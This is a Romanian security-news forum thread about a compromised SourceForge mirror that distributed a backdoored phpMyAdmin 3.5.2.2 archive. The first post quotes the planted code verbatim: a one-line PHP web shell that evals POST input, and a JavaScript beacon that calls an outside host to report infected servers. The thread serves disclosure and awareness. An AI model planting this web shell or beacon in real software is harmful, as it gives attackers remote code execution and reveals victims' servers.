Jump to content
B7ackAnge7z

Backdoor în phpMyAdmin

By B7ackAnge7z, in Stiri securitate

Recommended Posts

B7ackAnge7z Newbie

B7ackAnge7z

Posted
Posted

De curând echipa ce r?spunde de securitatea phpMyAdmin a anun?at c? unul din serverele SourceForge.Net a fost compromis, iar la arhiva phpMyAdmin-3.5.2.2-all-languages.zip a fost ad?ugat fi?ierul server_sync.php ce con?ine urm?torul cod PHP:

<?php @eval($_POST['c']); ?>

De asemenea a fost modificat ?i fi?ierul /js/cross_framing_protection.js unde a fost ad?ugat urm?torul cod JavaScript (pentru a afla adresele serverelor infectate):

var icon ;
icon = document.createElement("img");
icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";
icon.width=0;
icon.height=0;
document.body.appendChild(icon);

Conform declara?iilor oficiale ale administra?iei SourceForge.Net, aproximativ 400 utilizatori au desc?rcat fi?ierul ce con?ine acest backdoor.

Sursa: Compromised SourceForge mirror

  • Upvote 1
B7ackAnge7z Newbie

B7ackAnge7z

Posted
  • Author
Posted
Si... Cum a ajuns acolo? :-?

Eu speram c? administra?ia SourceForge.Net va publica mai târziu detalii despre ce ?i cum s-a întâmplat acest lucru. Pân? acum — nimic. Îns?, dat fiind faptul c? a fost compromis doar serverul cdnetworks-kr-1.dl.sourceforge.net, putem presupune c? vinovat se face provider-ul ce de?ine(a) acest server.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...